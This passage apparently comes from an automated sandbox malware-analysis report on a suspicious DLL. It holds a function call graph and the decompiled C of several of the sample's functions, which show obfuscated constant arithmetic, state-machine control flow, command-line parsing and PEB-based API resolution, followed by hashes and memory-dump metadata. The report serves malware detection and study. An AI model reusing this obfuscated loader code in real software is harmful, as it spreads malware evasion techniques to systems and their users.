d3e3f5 4965->4861 4966 d3483c GetPEB 4966->4967 4967->4965 4967->4966 4973 d31afd 4967->4973 4970 d462eb 4969->4970 4971 d3eb52 GetPEB 4970->4971 4972 d46383 4971->4972 4972->4958 4972->4961 4974 d31b10 4973->4974 4975 d3eb52 GetPEB 4974->4975 4976 d31bba 4975->4976 4976->4967 4981 d49797 4977->4981 4979 d49967 4979->4875 4980 d4bc6b GetPEB 4980->4981 4981->4979 4981->4980 4982 d49956 4981->4982 4997 d372c4 4981->4997 5001 d3f9c1 4981->5001 4984 d51538 GetPEB 4982->4984 4984->4979 4987 d401c2 4985->4987 4989 d4fe2a GetPEB 4987->4989 4990 d406f1 4987->4990 4991 d4e1f8 GetPEB 4987->4991 4993 d4fecb GetPEB 4987->4993 5005 d3473d 4987->5005 5009 d44178 4987->5009 5013 d47952 4987->5013 4989->4987 4990->4875 4991->4987 4993->4987 4995 d3eb52 GetPEB 4994->4995 4996 d4bd0a 4995->4996 4996->4875 4998 d372e0 4997->4998 4999 d3eb52 GetPEB 4998->4999 5000 d3737c 4999->5000 5000->4981 5002 d3f9eb 5001->5002 5003 d3eb52 GetPEB 5002->5003 5004 d3fa7c 5003->5004 5004->4981 5006 d34786 5005->5006 5007 d3eb52 GetPEB 5006->5007 5008 d3481a 5007->5008 5008->4987 5010 d44194 5009->5010 5011 d3eb52 GetPEB 5010->5011 5012 d44233 5011->5012 5012->4987 5014 d47965 5013->5014 5015 d3eb52 GetPEB 5014->5015 5016 d47a04 5015->5016 5016->4987 5018 d3dd30 5017->5018 5019 d3dd16 5017->5019 5018->4238 5019->5018 5020 d52b09 GetPEB 5019->5020 5020->5019 5030 d541ee 5021->5030 5022 d4e1f8 GetPEB 5022->5030 5023 d543c9 5023->4238 5025 d3f96f GetPEB 5025->5030 5026 d543b4 5027 d52b09 GetPEB 5026->5027 5027->5023 5028 d4fecb GetPEB 5028->5030 5029 d3c5d8 GetPEB 5029->5030 5030->5022 5030->5023 5030->5025 5030->5026 5030->5028 5030->5029 5035 d43d85 5030->5035 5032 d3328d 5031->5032 5039 d37442 5032->5039 5036 d43d9c 5035->5036 5037 d3c5d8 GetPEB 5036->5037 5038 d43e5b 5037->5038 5038->5030 5038->5038 5047 d37462 5039->5047 5040 d3c5d8 GetPEB 5040->5047 5043 d37576 5046 d52b09 GetPEB 5043->5046 5044 d3331d 5044->4238 5046->5044 5047->5040 5047->5043 5047->5044 5048 d48fae 5047->5048 5057 d40d04 
5047->5057 5062 d40f86 5047->5062 5056 d494f3 5048->5056 5049 d4969b 5050 d3f7fe GetPEB 5049->5050 5051 d49699 5050->5051 5051->5047 5052 d4e1f8 GetPEB 5052->5056 5054 d3738a GetPEB 5054->5056 5055 d4fecb GetPEB 5055->5056 5056->5049 5056->5051 5056->5052 5056->5054 5056->5055 5079 d3bc32 5056->5079 5083 d32ebf 5057->5083 5060 d52b09 GetPEB 5061 d40dde 5060->5061 5061->5047 5077 d41c7c 5062->5077 5063 d4c237 GetPEB 5063->5077 5065 d32ebf GetPEB 5065->5077 5066 d3bc32 GetPEB 5066->5077 5067 d42118 5072 d3f7fe GetPEB 5067->5072 5068 d4e1f8 GetPEB 5068->5077 5071 d42116 5071->5047 5072->5071 5075 d3738a GetPEB 5075->5077 5076 d4c9b0 GetPEB 5076->5077 5077->5063 5077->5065 5077->5066 5077->5067 5077->5068 5077->5071 5077->5075 5077->5076 5078 d4fecb GetPEB 5077->5078 5087 d33431 5077->5087 5102 d516c0 5077->5102 5106 d4c2cf 5077->5106 5110 d543e6 5077->5110 5114 d351e7 5077->5114 5078->5077 5080 d3bc62 5079->5080 5081 d3eb52 GetPEB 5080->5081 5082 d3bd08 5081->5082 5082->5056 5084 d32ed3 5083->5084 5085 d3eb52 GetPEB 5084->5085 5086 d32f74 5085->5086 5086->5060 5101 d34267 5087->5101 5088 d52b09 GetPEB 5088->5101 5089 d4e1f8 GetPEB 5089->5101 5090 d34738 5090->5090 5091 d3c5d8 GetPEB 5091->5101 5092 d342a0 5096 d3f7fe GetPEB 5092->5096 5093 d3f288 GetPEB 5093->5101 5095 d400c5 GetPEB 5095->5101 5097 d342be 5096->5097 5097->5077 5098 d3738a GetPEB 5098->5101 5100 d4fecb GetPEB 5100->5101 5101->5088 5101->5089 5101->5090 5101->5091 5101->5092 5101->5093 5101->5095 5101->5098 5101->5100 5118 d350e8 5101->5118 5122 d349a4 5101->5122 5103 d516f5 5102->5103 5104 d3eb52 GetPEB 5103->5104 5105 d517a1 5104->5105 5105->5077 5107 d4c2e5 5106->5107 5108 d3eb52 GetPEB 5107->5108 5109 d4c370 5108->5109 5109->5077 5111 d54405 5110->5111 5112 d3eb52 GetPEB 5111->5112 5113 d54498 5112->5113 5113->5077 5115 d35206 5114->5115 5116 d3eb52 GetPEB 5115->5116 5117 d352a5 5116->5117 5117->5077 5119 d35123 5118->5119 5120 d3eb52 GetPEB 5119->5120 5121 d351c6 5120->5121 5121->5101 5123 d349d5 
5122->5123 5124 d3eb52 GetPEB 5123->5124 5125 d34a6b 5124->5125 5125->5101 5127 d348f4 5126->5127 5128 d3eb52 GetPEB 5127->5128 5129 d34996 5128->5129 5129->4248 5131 d31eb4 5130->5131 5132 d3eb52 GetPEB 5131->5132 5133 d31f2d 5132->5133 5133->4258 5135 d3bf93 5134->5135 5136 d531aa GetPEB 5135->5136 5137 d3bfb6 5136->5137 5137->4271 5142 d4dfa2 5138->5142 5139 d353d0 GetPEB 5139->5142 5141 d4e1f8 GetPEB 5141->5142 5142->5139 5142->5141 5143 d4e0e6 5142->5143 5144 d32dea GetPEB 5142->5144 5145 d4fecb GetPEB 5142->5145 5156 d5298d 5142->5156 5143->4276 5144->5142 5145->5142 5149 d31cc0 5146->5149 5148 d4fe2a GetPEB 5148->5149 5149->5148 5150 d31e90 5149->5150 5160 d32f80 5149->5160 5164 d406fe 5149->5164 5150->4276 5153 d38581 5152->5153 5154 d3eb52 GetPEB 5153->5154 5155 d3862b 5154->5155 5155->4283 5157 d529a3 5156->5157 5158 d3eb52 GetPEB 5157->5158 5159 d52a27 5158->5159 5159->5142 5161 d32f9f 5160->5161 5162 d3eb52 GetPEB 5161->5162 5163 d33039 5162->5163 5163->5149 5165 d4071c 5164->5165 5166 d3eb52 GetPEB 5165->5166 5167 d407dc 5166->5167 5167->5149 5168 d4befd 5169 d409dd GetPEB 5168->5169 5170 d4c1a1 5169->5170 5171 d5061d 2 API calls 5170->5171 5172 d4c1b8 5171->5172 5173 d4c229 5172->5173 5174 d4e1f8 GetPEB 5172->5174 5175 d4c1d6 5174->5175 5176 d52d0a GetPEB 5175->5176 5177 d4c1ff 5176->5177 5178 d4fecb GetPEB 5177->5178 5179 d4c212 5178->5179 5180 d3d061 GetPEB 5179->5180 5180->5173 5197 d536aa 5207 d53bc2 5197->5207 5198 d3c5d8 GetPEB 5198->5207 5199 d52b09 GetPEB 5199->5207 5200 d50db1 GetPEB 5200->5207 5201 d53df0 5202 d51538 GetPEB 5201->5202 5203 d53dee 5202->5203 5204 d409dd GetPEB 5204->5207 5206 d545ca GetPEB 5206->5207 5207->5198 5207->5199 5207->5200 5207->5201 5207->5203 5207->5204 5207->5206 5209 d5061d 2 API calls 5207->5209 5210 d4e406 5207->5210 5214 d527bc 5207->5214 5209->5207 5211 d4e434 5210->5211 5212 d3eb52 GetPEB 5211->5212 5213 d4e4c9 5212->5213 5213->5207 5215 d527cf 5214->5215 5216 d3eb52 GetPEB 5215->5216 5217 d52873 5216->5217 
5217->5207 5218 d31a2c 5219 d31a59 5218->5219 5220 d3eb52 GetPEB 5219->5220 5221 d31aeb 5220->5221

                          Executed Functions

                          Control-flow Graph

                          C-Code - Quality: 95%
                          			E00D4EFDD() {
                          				char _v520;
                          				char _v1040;
                          				char _v1560;
                          				signed int _v1564;
                          				signed int _v1568;
                          				signed int _v1572;
                          				signed int _v1576;
                          				signed int _v1580;
                          				signed int _v1584;
                          				signed int _v1588;
                          				signed int _v1592;
                          				signed int _v1596;
                          				signed int _v1600;
                          				signed int _v1604;
                          				signed int _v1608;
                          				signed int _v1612;
                          				signed int _v1616;
                          				signed int _v1620;
                          				signed int _v1624;
                          				signed int _v1628;
                          				signed int _v1632;
                          				signed int _v1636;
                          				signed int _v1640;
                          				signed int _v1644;
                          				signed int _v1648;
                          				signed int _v1652;
                          				signed int _v1656;
                          				signed int _v1660;
                          				signed int _v1664;
                          				signed int _v1668;
                          				signed int _v1672;
                          				signed int _v1676;
                          				signed int _v1680;
                          				signed int _v1684;
                          				signed int _v1688;
                          				signed int _v1692;
                          				signed int _v1696;
                          				signed int _v1700;
                          				signed int _v1704;
                          				signed int _v1708;
                          				signed int _v1712;
                          				signed int _v1716;
                          				signed int _v1720;
                          				signed short* _t381;
                          				signed int _t393;
                          				signed int _t395;
                          				signed int _t397;
                          				signed int _t398;
                          				signed int _t399;
                          				signed int _t400;
                          				signed int _t401;
                          				signed int _t402;
                          				signed int _t403;
                          				signed int _t404;
                          				signed int _t405;
                          				signed int _t415;
                          				signed int* _t444;
                          				void* _t445;
                          				signed int _t449;
                          				signed int _t450;
                          				signed short* _t451;
                          				signed int* _t452;
                          
                          				_t452 =  &_v1720;
                          				_v1648 = 0xf9e68a;
                          				_v1648 = _v1648 ^ 0xa89cfd85;
                          				_v1648 = _v1648 | 0xe1599fd2;
                          				_v1648 = _v1648 ^ 0xe97d9ff6;
                          				_v1592 = 0x52ca29;
                          				_v1592 = _v1592 + 0xa8c7;
                          				_v1592 = _v1592 ^ 0x005b0974;
                          				_v1632 = 0x5fd17f;
                          				_t397 = 0x55;
                          				_v1632 = _v1632 / _t397;
                          				_v1632 = _v1632 + 0x4a14;
                          				_t395 = 0;
                          				_v1632 = _v1632 ^ 0x0007d59d;
                          				_t445 = 0x5f4d19a;
                          				_v1584 = 0xb2803c;
                          				_t398 = 0x15;
                          				_v1584 = _v1584 / _t398;
                          				_v1584 = _v1584 ^ 0x0001d429;
                          				_v1700 = 0x18b17c;
                          				_v1700 = _v1700 >> 4;
                          				_v1700 = _v1700 << 0xb;
                          				_v1700 = _v1700 | 0x5bcbde76;
                          				_v1700 = _v1700 ^ 0x5fd8859a;
                          				_v1716 = 0x3ed9a0;
                          				_v1716 = _v1716 >> 2;
                          				_v1716 = _v1716 | 0xf2214935;
                          				_v1716 = _v1716 + 0xffff6098;
                          				_v1716 = _v1716 ^ 0xf2246cf7;
                          				_v1616 = 0xd3100b;
                          				_v1616 = _v1616 << 0xb;
                          				_v1616 = _v1616 ^ 0x988d1f7d;
                          				_v1576 = 0x49dab3;
                          				_t399 = 0x41;
                          				_v1576 = _v1576 / _t399;
                          				_v1576 = _v1576 ^ 0x00091b0c;
                          				_v1604 = 0x610b2e;
                          				_v1604 = _v1604 >> 3;
                          				_v1604 = _v1604 ^ 0x000d4028;
                          				_v1708 = 0x5e4148;
                          				_v1708 = _v1708 * 0x7c;
                          				_v1708 = _v1708 + 0x543c;
                          				_v1708 = _v1708 * 0x6e;
                          				_v1708 = _v1708 ^ 0x9e2c7101;
                          				_v1580 = 0x8fa7d1;
                          				_v1580 = _v1580 | 0x5a90bc2e;
                          				_v1580 = _v1580 ^ 0x5a99780a;
                          				_v1644 = 0xdfbfec;
                          				_v1644 = _v1644 ^ 0x5e27e596;
                          				_v1644 = _v1644 + 0xffff45c7;
                          				_v1644 = _v1644 ^ 0x5efb0694;
                          				_v1652 = 0xa5c8eb;
                          				_v1652 = _v1652 ^ 0x9b43bc99;
                          				_v1652 = _v1652 * 0x26;
                          				_v1652 = _v1652 ^ 0x243194e2;
                          				_v1596 = 0xb87d2a;
                          				_v1596 = _v1596 ^ 0x06815b6e;
                          				_v1596 = _v1596 ^ 0x0639024b;
                          				_v1568 = 0xf0e227;
                          				_v1568 = _v1568 * 0x3d;
                          				_v1568 = _v1568 ^ 0x396ce50f;
                          				_v1572 = 0x747c0d;
                          				_v1572 = _v1572 + 0xffffb798;
                          				_v1572 = _v1572 ^ 0x0071a7b9;
                          				_v1656 = 0x3795ed;
                          				_v1656 = _v1656 | 0xbce94746;
                          				_t400 = 0x26;
                          				_v1656 = _v1656 / _t400;
                          				_v1656 = _v1656 ^ 0x04ffd641;
                          				_v1628 = 0xc97098;
                          				_t401 = 0x3f;
                          				_v1628 = _v1628 / _t401;
                          				_v1628 = _v1628 << 2;
                          				_v1628 = _v1628 ^ 0x0000c1e6;
                          				_v1664 = 0x186675;
                          				_v1664 = _v1664 + 0x5979;
                          				_v1664 = _v1664 + 0xda5e;
                          				_v1664 = _v1664 ^ 0x0013e2ca;
                          				_v1672 = 0x37994d;
                          				_t402 = 0x3c;
                          				_v1672 = _v1672 / _t402;
                          				_v1672 = _v1672 << 6;
                          				_v1672 = _v1672 ^ 0x0033bfe5;
                          				_v1588 = 0x8a41f;
                          				_v1588 = _v1588 ^ 0x744a78fd;
                          				_v1588 = _v1588 ^ 0x744e2179;
                          				_v1720 = 0x535779;
                          				_v1720 = _v1720 << 0xd;
                          				_v1720 = _v1720 + 0x4332;
                          				_v1720 = _v1720 + 0x735f;
                          				_v1720 = _v1720 ^ 0x6aed3196;
                          				_v1692 = 0x449a24;
                          				_t403 = 0x7f;
                          				_v1692 = _v1692 / _t403;
                          				_v1692 = _v1692 >> 0xb;
                          				_v1692 = _v1692 | 0x1a1cc036;
                          				_v1692 = _v1692 ^ 0x1a141e74;
                          				_v1680 = 0xcbdb4c;
                          				_t404 = 0x32;
                          				_v1680 = _v1680 / _t404;
                          				_v1680 = _v1680 + 0xffff62cd;
                          				_v1680 = _v1680 ^ 0x0005b6c2;
                          				_v1712 = 0x490fe1;
                          				_v1712 = _v1712 + 0xffff5c72;
                          				_v1712 = _v1712 | 0x8d0799de;
                          				_v1712 = _v1712 + 0xd1c7;
                          				_v1712 = _v1712 ^ 0x8d59d7bd;
                          				_v1564 = 0xeb31a6;
                          				_v1564 = _v1564 + 0x9db9;
                          				_v1564 = _v1564 ^ 0x00ef2ed2;
                          				_v1636 = 0x2bc790;
                          				_v1636 = _v1636 << 0xd;
                          				_v1636 = _v1636 + 0xc361;
                          				_v1636 = _v1636 ^ 0x78fc9b03;
                          				_v1608 = 0x9c27ff;
                          				_t405 = 0x79;
                          				_v1608 = _v1608 / _t405;
                          				_v1608 = _v1608 ^ 0x00083646;
                          				_v1612 = 0x2811b5;
                          				_v1612 = _v1612 << 7;
                          				_v1612 = _v1612 ^ 0x140bb062;
                          				_v1704 = 0x10f563;
                          				_v1704 = _v1704 << 7;
                          				_v1704 = _v1704 + 0x8e91;
                          				_v1704 = _v1704 >> 1;
                          				_v1704 = _v1704 ^ 0x043150d1;
                          				_v1668 = 0xd17281;
                          				_v1668 = _v1668 + 0xffff6975;
                          				_v1668 = _v1668 * 5;
                          				_v1668 = _v1668 ^ 0x041d3199;
                          				_v1676 = 0x45cf94;
                          				_v1676 = _v1676 | 0xf5b6f9ff;
                          				_v1676 = _v1676 ^ 0xf5f7fea4;
                          				_v1640 = 0xed0f5a;
                          				_v1640 = _v1640 | 0x16dcab92;
                          				_v1640 = _v1640 ^ 0xea8ad617;
                          				_v1640 = _v1640 ^ 0xfc77378a;
                          				_v1684 = 0xfd4b0d;
                          				_v1684 = _v1684 ^ 0xf5deb09c;
                          				_v1684 = _v1684 * 0x14;
                          				_v1684 = _v1684 ^ 0x26c6ef50;
                          				_v1600 = 0xb07e76;
                          				_v1600 = _v1600 + 0x891d;
                          				_v1600 = _v1600 ^ 0x00bcbcf5;
                          				_v1660 = 0xdc9573;
                          				_v1660 = _v1660 | 0xf03871f4;
                          				_v1660 = _v1660 >> 9;
                          				_v1660 = _v1660 ^ 0x0071eac7;
                          				_v1620 = 0x8203d2;
                          				_v1620 = _v1620 ^ 0xa8466021;
                          				_v1620 = _v1620 ^ 0xa8c8da0e;
                          				_v1688 = 0x3e6237;
                          				_v1688 = _v1688 + 0x1a50;
                          				_v1688 = _v1688 >> 3;
                          				_t451 = _v1620;
                          				_v1688 = _v1688 * 0x2f;
                          				_v1688 = _v1688 ^ 0x0160f017;
                          				_v1696 = 0x29d1f1;
                          				_v1696 = _v1696 + 0xffffde63;
                          				_v1696 = _v1696 + 0xffff46cf;
                          				_v1696 = _v1696 * 0x14;
                          				_v1696 = _v1696 ^ 0x033cdd59;
                          				_v1624 = 0xc011c7;
                          				_v1624 = _v1624 + 0xffff119f;
                          				_v1624 = _v1624 >> 7;
                          				_v1624 = _v1624 ^ 0x00036cbb;
                          				while(_t445 != 0x2906f2f) {
                          					if(_t445 == 0x5f4d19a) {
                          						E00D4FE2A(_v1592, _v1632, 0x208,  &_v1560);
                          						_pop(_t405);
                          						_t445 = 0x2906f2f;
                          						continue;
                          					}
                          					if(_t445 == 0x6d37c50) {
                          						_t381 = _t451;
                          						__eflags =  *_t451 - _t395;
                          						if(__eflags == 0) {
                          							L17:
                          							_t445 = 0xfe0ac9e;
                          							continue;
                          						} else {
                          							goto L10;
                          						}
                          						do {
                          							L10:
                          							__eflags =  *_t381 - 0x2c;
                          							if( *_t381 != 0x2c) {
                          								goto L16;
                          							}
                          							_t444 =  &_v1560;
                          							while(1) {
                          								_t381 =  &(_t381[1]);
                          								_t415 =  *_t381 & 0x0000ffff;
                          								__eflags = _t415;
                          								if(_t415 == 0) {
                          									break;
                          								}
                          								__eflags = _t415 - 0x20;
                          								if(_t415 == 0x20) {
                          									break;
                          								}
                          								 *_t444 = _t415;
                          								_t444 =  &(_t444[0]);
                          								__eflags = _t444;
                          							}
                          							_t405 = 0;
                          							__eflags = 0;
                          							 *_t444 = 0;
                          							L16:
                          							_t381 =  &(_t381[1]);
                          							__eflags =  *_t381 - _t395;
                          						} while (__eflags != 0);
                          						goto L17;
                          					}
                          					if(_t445 == 0x88437ca) {
                          						E00D31A34(_v1572,  &_v1040, _t405, _t405, _v1656, _v1628, _v1664, _t405, _v1648, _v1672);
                          						E00D50DB1(_v1588,  &_v520, __eflags, _v1720, _v1572, _v1692);
                          						_push(_v1636);
                          						_push(_v1564);
                          						_push(_v1712);
                          						_t449 = E00D4E1F8(0xd31160, _v1680, __eflags);
                          						E00D52D0A(_v1612, __eflags,  &_v520, _v1704, _v1668, _v1676, 0xd31160, _t451,  &_v1040, _t449);
                          						_t405 = _t449;
                          						E00D4FECB(_t405, _v1640, _v1684, _v1600, _v1660);
                          						_t452 =  &(_t452[0x19]);
                          						_t445 = 0xc3a6a1c;
                          						continue;
                          					}
                          					if(_t445 == 0xc3a6a1c) {
                          						_push(_t405);
                          						E00D485FF(_v1620, _v1688, __eflags, _t395, _t451, _t395, _v1696, _t395, _v1624);
                          						_t395 = 1;
                          						__eflags = 1;
                          						L23:
                          						return _t395;
                          					}
                          					_t462 = _t445 - 0xfe0ac9e;
                          					if(_t445 == 0xfe0ac9e) {
                          						_push(_v1576);
                          						_push(_v1616);
                          						_push(_v1716);
                          						_t450 = E00D4E1F8(0xd31120, _v1700, _t462);
                          						_t393 = E00D5061D(_v1604, _t450,  &_v1560, _v1708, _v1580); // executed
                          						_t405 = _t450;
                          						asm("sbb edi, edi");
                          						_t445 = ( ~_t393 & 0x02221bd6) + 0x6621bf4;
                          						E00D4FECB(_t405, _v1644, _v1652, _v1596, _v1568);
                          						_t452 =  &(_t452[9]);
                          					}
                          					L20:
                          					if(_t445 != 0x6621bf4) {
                          						continue;
                          					}
                          					goto L23;
                          				}
                          				_t451 = E00D3C307();
                          				_t445 = 0x6d37c50;
                          				goto L20;
                          			}

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: |t$(@$7b>$<T$HA^$_s$t[$y!Nt$yWS$yY
                          • API String ID: 0-3414766599
                          • Opcode ID: 0eda86ebe29daea399630ab161dcff49239885342a5110db174bfa7b9283f28f
                          • Instruction ID: e781499169299b5b0d47dd1452230a5c3e5216aeab557b2111104be7bfc05c8f
                          • Opcode Fuzzy Hash: 0eda86ebe29daea399630ab161dcff49239885342a5110db174bfa7b9283f28f
                          • Instruction Fuzzy Hash: D10200725083809FD368CF21C48AA5BBBE2FBC5318F50891DF6D986260D7B59949CF53
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 46 d5061d-d506eb call d4fe29 call d3eb52 lstrcmpiW
                          APIs
                          • lstrcmpiW.KERNELBASE(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00D506E5
                          Memory Dump Source
                          • Source File: 00000000.00000002.403379597.0000000000D31000.00000020.00000001.sdmp, Offset: 00D30000, based on PE: true
                          • Associated: 00000000.00000002.403368909.0000000000D30000.00000004.00000001.sdmp
                          • Associated: 00000000.00000002.403437230.0000000000D56000.00000004.00000001.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_d30000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcmpi
                          • String ID:
                          • API String ID: 1586166983-0
                          • Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                          • Instruction ID: 84b76911e3e4d3bc8e60d52dc92b925ae8a444a5e31d632b1018a18e87031609
                          • Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
                          • Instruction Fuzzy Hash: E72113B1C01309ABCF14DFA9D94A9DEBFB5FB20354F108198E529A6291D3B48B04CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          C-Code - Quality: 97%
                          			E00D38636() {
                          				signed int _v12;
                          				signed int _v20;
                          				intOrPtr _v24;
                          				signed int _v44;
                          				char _v56;
                          				signed int _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				char _v100;
                          				char _v108;
                          				signed int _v144;
                          				char _v152;
                          				char _v160;
                          				char _v164;
                          				char _v168;
                          				char _v172;
                          				char _v176;
                          				signed int _v180;
                          				signed int _v184;
                          				unsigned int _v188;
                          				signed int _v192;
                          				signed int _v196;
                          				signed int _v200;
                          				signed int _v204;
                          				signed int _v208;
                          				signed int _v212;
                          				unsigned int _v216;
                          				signed int _v220;
                          				signed int _v224;
                          				signed int _v228;
                          				signed int _v232;
                          				signed int _v236;
                          				signed int _v240;
                          				signed int _v244;
                          				signed int _v248;
                          				signed int _v252;
                          				signed int _v256;
                          				signed int _v260;
                          				signed int _v264;
                          				unsigned int _v268;
                          				unsigned int _v272;
                          				signed int _v276;
                          				signed int _v280;
                          				signed int _v284;
                          				signed int _v288;
                          				signed int _v292;
                          				signed int _v296;
                          				signed int _v300;
                          				signed int _v304;
                          				signed int _v308;
                          				signed int _v312;
                          				signed int _v316;
                          				signed int _v320;
                          				signed int _v324;
                          				signed int _v328;
                          				signed int _v332;
                          				unsigned int _v336;
                          				signed int _v340;
                          				signed int _v344;
                          				signed int _v348;
                          				signed int _v352;
                          				signed int _v356;
                          				signed int _v360;
                          				signed int _v364;
                          				signed int _v368;
                          				signed int _v372;
                          				signed int _v376;
                          				signed int _v380;
                          				signed int _v384;
                          				signed int _v388;
                          				signed int _v392;
                          				signed int _v396;
                          				signed int _v400;
                          				signed int _v404;
                          				signed int _v408;
                          				signed int _v412;
                          				signed int _v416;
                          				signed int _v420;
                          				signed int _v424;
                          				signed int _v428;
                          				signed int _v432;
                          				signed int _v436;
                          				signed int _v440;
                          				signed int _v444;
                          				unsigned int _v448;
                          				signed int _v452;
                          				signed int _v456;
                          				signed int _v460;
                          				signed int _v464;
                          				signed int _v468;
                          				signed int _v472;
                          				signed int _v476;
                          				signed int _v480;
                          				signed int _v484;
                          				unsigned int _v488;
                          				signed int _v492;
                          				signed int _v496;
                          				signed int _v500;
                          				signed int _v504;
                          				signed int _v508;
                          				signed int _v512;
                          				signed int _v516;
                          				signed int _v520;
                          				signed int _v524;
                          				unsigned int _v528;
                          				signed int _v532;
                          				signed int _v536;
                          				signed int _v540;
                          				signed int _v544;
                          				signed int _v548;
                          				signed int _v552;
                          				unsigned int _v556;
                          				signed int _v560;
                          				signed int _v564;
                          				signed int _v568;
                          				signed int _v572;
                          				signed int _v576;
                          				signed int _v580;
                          				signed int _v584;
                          				unsigned int _v588;
                          				signed int _v592;
                          				signed int _v596;
                          				signed int _v600;
                          				signed int _v604;
                          				signed int _v608;
                          				signed int _v612;
                          				signed int _v616;
                          				unsigned int _v620;
                          				signed int _v624;
                          				signed int _v628;
                          				signed int _v632;
                          				signed int _v636;
                          				signed int _v640;
                          				signed int _v644;
                          				signed int _v648;
                          				signed int _v652;
                          				signed int _v656;
                          				signed int _v660;
                          				signed int _v664;
                          				signed int _v668;
                          				signed int _v672;
                          				unsigned int _v676;
                          				signed int _t1259;
                          				signed int _t1287;
                          				signed int _t1299;
                          				signed int _t1310;
                          				signed int _t1340;
                          				signed int _t1341;
                          				signed int _t1343;
                          				signed int _t1344;
                          				signed int _t1345;
                          				signed int _t1346;
                          				signed int _t1347;
                          				signed int _t1348;
                          				signed int _t1349;
                          				signed int _t1350;
                          				signed int _t1351;
                          				signed int _t1352;
                          				signed int _t1353;
                          				signed int _t1354;
                          				signed int _t1355;
                          				signed int _t1356;
                          				signed int _t1357;
                          				signed int _t1358;
                          				signed int _t1359;
                          				signed int _t1360;
                          				signed int _t1361;
                          				signed int _t1362;
                          				signed int _t1363;
                          				signed int _t1364;
                          				signed int _t1365;
                          				signed int _t1384;
                          				signed int _t1465;
                          				signed int _t1466;
                          				signed int _t1469;
                          				signed int _t1482;
                          				signed int _t1495;
                          				signed int _t1498;
                          				void* _t1500;
                          				void* _t1504;
                          				void* _t1505;
                          				void* _t1506;
                          
                          				_t1500 = (_t1498 & 0xfffffff8) - 0x2a0;
                          				_v548 = 0x612d76;
                          				_v548 = _v548 + 0xffffb226;
                          				_v548 = _v548 ^ 0x25733830;
                          				_v548 = _v548 + 0x94f7;
                          				_v548 = _v548 ^ 0x25147da1;
                          				_v608 = 0x8e6410;
                          				_v608 = _v608 | 0x5e5673b6;
                          				_v608 = _v608 ^ 0x9913f1ef;
                          				_v608 = _v608 * 0x3a;
                          				_t1469 = 0xe6d4a04;
                          				_v608 = _v608 ^ 0x4490702a;
                          				_v332 = 0x40e6a4;
                          				_v332 = _v332 ^ 0x1ba14b53;
                          				_v332 = _v332 ^ 0x1be1adf7;
                          				_v388 = 0xd7ca30;
                          				_t1343 = 0x42;
                          				_v388 = _v388 / _t1343;
                          				_v388 = _v388 + 0x3798;
                          				_v388 = _v388 ^ 0x000f1b75;
                          				_v216 = 0xd7fc5;
                          				_v216 = _v216 >> 1;
                          				_v216 = _v216 ^ 0x0004b337;
                          				_v516 = 0x59f14d;
                          				_v516 = _v516 >> 0xf;
                          				_t1344 = 0x4a;
                          				_v516 = _v516 / _t1344;
                          				_v516 = _v516 << 0xb;
                          				_v516 = _v516 ^ 0x00046054;
                          				_v304 = 0xedc603;
                          				_v304 = _v304 + 0xffffc02b;
                          				_v304 = _v304 ^ 0x00efeb53;
                          				_v232 = 0x637592;
                          				_t1465 = 0x6f;
                          				_t1345 = 0x31;
                          				_v232 = _v232 * 0x71;
                          				_v232 = _v232 ^ 0x2bef3074;
                          				_v372 = 0x919268;
                          				_v372 = _v372 << 9;
                          				_v372 = _v372 + 0x904f;
                          				_v372 = _v372 ^ 0x2324b0cf;
                          				_v484 = 0x568eb3;
                          				_v484 = _v484 * 0x42;
                          				_v484 = _v484 / _t1465;
                          				_v484 = _v484 ^ 0x0034ded9;
                          				_v472 = 0x365886;
                          				_v472 = _v472 << 0xc;
                          				_v472 = _v472 + 0xffff5d21;
                          				_v472 = _v472 ^ 0x6583ba5b;
                          				_v436 = 0xdfd34b;
                          				_v436 = _v436 / _t1345;
                          				_v436 = _v436 | 0x191717ac;
                          				_v436 = _v436 ^ 0x1914e100;
                          				_v196 = 0xd88df0;
                          				_t1346 = 0x15;
                          				_v196 = _v196 / _t1346;
                          				_v196 = _v196 ^ 0x0009e710;
                          				_v356 = 0xb64ed2;
                          				_v356 = _v356 >> 0xd;
                          				_t1340 = 0x1c;
                          				_t1347 = 0x51;
                          				_v356 = _v356 * 0x63;
                          				_v356 = _v356 ^ 0x0006dcaa;
                          				_v336 = 0x65c0e5;
                          				_v336 = _v336 * 0x7a;
                          				_v336 = _v336 >> 3;
                          				_v336 = _v336 ^ 0x060f054d;
                          				_v492 = 0x31a1;
                          				_v492 = _v492 ^ 0x5b528d22;
                          				_v492 = _v492 << 5;
                          				_v492 = _v492 ^ 0x6a59b43c;
                          				_v652 = 0x40a60;
                          				_v652 = _v652 | 0x6178721b;
                          				_v652 = _v652 + 0x8e9b;
                          				_v652 = _v652 / _t1340;
                          				_v652 = _v652 ^ 0x037a42dd;
                          				_v272 = 0xf0169f;
                          				_v272 = _v272 >> 5;
                          				_v272 = _v272 ^ 0x0004695a;
                          				_v528 = 0x24fae7;
                          				_v528 = _v528 ^ 0xfec3499d;
                          				_v528 = _v528 << 0xf;
                          				_v528 = _v528 >> 0xc;
                          				_v528 = _v528 ^ 0x0001af4c;
                          				_v188 = 0x9b8757;
                          				_v188 = _v188 >> 4;
                          				_v188 = _v188 ^ 0x000b2d6a;
                          				_v256 = 0x948fd;
                          				_v256 = _v256 ^ 0xf30bafdb;
                          				_v256 = _v256 ^ 0xf30b6e1f;
                          				_v464 = 0x93fe09;
                          				_v464 = _v464 / _t1347;
                          				_t1348 = 0x23;
